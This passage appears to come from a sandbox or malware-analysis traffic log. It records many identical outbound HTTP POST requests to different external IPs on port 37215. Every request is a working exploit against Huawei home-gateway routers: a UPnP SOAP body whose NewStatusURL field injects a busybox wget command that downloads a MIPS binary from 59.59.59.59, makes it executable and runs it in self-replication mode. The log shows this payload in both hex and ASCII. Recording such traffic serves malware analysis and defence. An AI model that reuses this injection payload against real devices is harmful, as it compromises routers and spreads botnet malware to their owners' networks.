                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1327192.168.2.154240241.50.125.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805166960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1328192.168.2.15509168.24.25.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805208921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1329192.168.2.154535841.162.238.9137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805253983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1330192.168.2.1550172157.58.151.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805294991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1331192.168.2.1541920197.7.194.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805509090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1332192.168.2.1557840197.148.71.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805543900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1333192.168.2.1537186157.115.226.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805589914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1334192.168.2.1539890157.160.252.24337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805609941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1335192.168.2.1541866200.100.151.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805625916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1336192.168.2.1540314157.249.127.10437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805659056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
